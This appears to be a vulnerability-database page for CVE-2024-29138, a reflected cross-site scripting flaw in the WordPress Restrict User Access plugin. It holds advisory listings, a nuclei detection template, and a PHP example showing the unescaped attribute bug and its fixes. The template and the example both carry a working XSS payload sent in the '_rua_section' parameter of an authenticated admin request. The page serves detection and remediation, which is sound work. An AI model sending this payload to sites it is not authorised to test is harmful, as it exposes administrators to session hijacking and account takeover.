| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-29138 | 19 Mar 2024 15:27 | – | circl |
| WordPress Plugin Restrict User Access Cross-Site Scripting Vulnerability | 19 Mar 2024 00:00 | – | cnnvd |
| CVE-2024-29138 | 19 Mar 2024 13:40 | – | cve |
| CVE-2024-29138 WordPress Restrict User Access plugin <= 2.5 - Reflected Cross Site Scripting (XSS) vulnerability | 19 Mar 2024 13:40 | – | cvelist |
| EUVD-2024-26174 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-29138 | 19 Mar 2024 14:15 | – | nvd |
| CVE-2024-29138 | 19 Mar 2024 14:15 | – | osv |
| WordPress Restrict User Access – Membership Plugin with Force Plugin <= 2.5 is vulnerable to Cross Site Scripting (XSS) | 18 Mar 2024 00:00 | – | patchstack |
| PT-2024-22757 | 19 Mar 2024 00:00 | – | ptsecurity |
| CVE-2024-29138 | 5 Feb 2025 08:13 | – | redhatcve |
```yaml
id: CVE-2024-29138

info:
  name: WordPress Restrict User Access <= 2.5 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    WordPress Restrict User Access – Membership Plugin with Force versions before 2.6 is vulnerable to Reflected Cross-Site Scripting via the '_rua_section' parameter in the admin level edit page.
  impact: |
    Attackers can execute arbitrary scripts in authenticated admin browsers, potentially leading to session hijacking, privilege escalation, WordPress admin account takeover, malicious plugin installation, and website defacement.
  remediation: |
    Update Restrict User Access plugin to version 2.6 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/restrict-user-access/vulnerability/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29138
    - https://wordpress.org/plugins/restrict-user-access/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-29138
    epss-score: 0.00622
    epss-percentile: 0.45452
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/plugins/restrict-user-access/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,authenticated,vkev

flow: http(1) && http(2)

http:
  # Step 1: authenticate; the login cookie is carried into the second request.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  # Step 2: the probe string is considered reflected only when it appears
  # unencoded in an HTML response that also references the plugin.
  - raw:
      - |
        POST /wp-admin/admin.php?page=wprua-level&action=edit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        level_id=1&_rua_section="><svg onload=alert(document.domain)>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "\"><svg onload=alert(document.domain)>","restrict-user-access")'
        condition: and
# digest: 4a0a0047304502204f9c92b0fa00a0611ccc0fdcaaa9eefbc753814cd958caf84102c0227bbbed03022100f887d4e50ddc977fae5f53bce429d2b2dbd5f0af7aa2d0fc09c08039f4e46f38:922c64590222798bb761d5b6d8e72950
```
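The template's second matcher succeeds only when the `_rua_section` value comes back byte-for-byte inside the admin page, which is the defining symptom of the CWE-79 class the description names: a request parameter written into an HTML attribute without escaping. The snippet below is an added illustration of that bug class and of the two usual fixes; it is not the Restrict User Access plugin's code, and the hidden-input markup, the `$request` array and the allow-list of section names are constructed assumptions. `esc_attr()` and `sanitize_key()` are WordPress's real helpers; the fallbacks defined here only approximate them so the file runs outside WordPress.

```php
<?php
// Added example (not the plugin's code): reflected XSS in an attribute context
// and how output escaping / input allow-listing stop it.

// Fallbacks so the file runs stand-alone. Assumption: these approximate
// WordPress's esc_attr() (attribute escaping) and sanitize_key()
// (lowercase a-z, 0-9, '_' and '-' only).
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('sanitize_key')) {
    function sanitize_key(string $key): string {
        return preg_replace('/[^a-z0-9_\-]/', '', strtolower($key));
    }
}

// Vulnerable pattern: a request-controlled value is concatenated straight
// into an attribute, so a leading double quote closes the attribute and
// whatever follows is parsed as markup. This is what the template's
// contains_all() matcher looks for in the response body.
function render_section_field_unsafe(array $request): string {
    $section = $request['_rua_section'] ?? '';
    return '<input type="hidden" name="_rua_section" value="' . $section . '">';
}

// Fix 1: escape for the attribute context at the point of output. The quote
// and angle brackets become entities, so the value can no longer leave the
// attribute and the probe string no longer appears verbatim in the body.
function render_section_field_escaped(array $request): string {
    $section = $request['_rua_section'] ?? '';
    return '<input type="hidden" name="_rua_section" value="' . esc_attr($section) . '">';
}

// Fix 2 (stronger): a section name is an identifier, so restrict it to a
// known set on input and still escape on output (defence in depth).
function render_section_field_allowlisted(array $request, array $known_sections): string {
    $section = sanitize_key($request['_rua_section'] ?? '');
    if (!in_array($section, $known_sections, true)) {
        $section = $known_sections[0]; // fall back to the default section
    }
    return '<input type="hidden" name="_rua_section" value="' . esc_attr($section) . '">';
}

// Constructed request reusing the page's own probe string.
$request = ['_rua_section' => '"><svg onload=alert(document.domain)>'];

echo render_section_field_unsafe($request), PHP_EOL;       // attribute is broken out of
echo render_section_field_escaped($request), PHP_EOL;      // probe stays inside the attribute as entities
echo render_section_field_allowlisted($request, ['general', 'members']), PHP_EOL; // unknown value replaced
```

Run with `php example.php`. Comparing the three output lines shows why the nuclei matcher is a reasonable detection: only the unsafe renderer returns the probe string unencoded, and that is the same check a reviewer applies when auditing a plugin's admin screens for CWE-79.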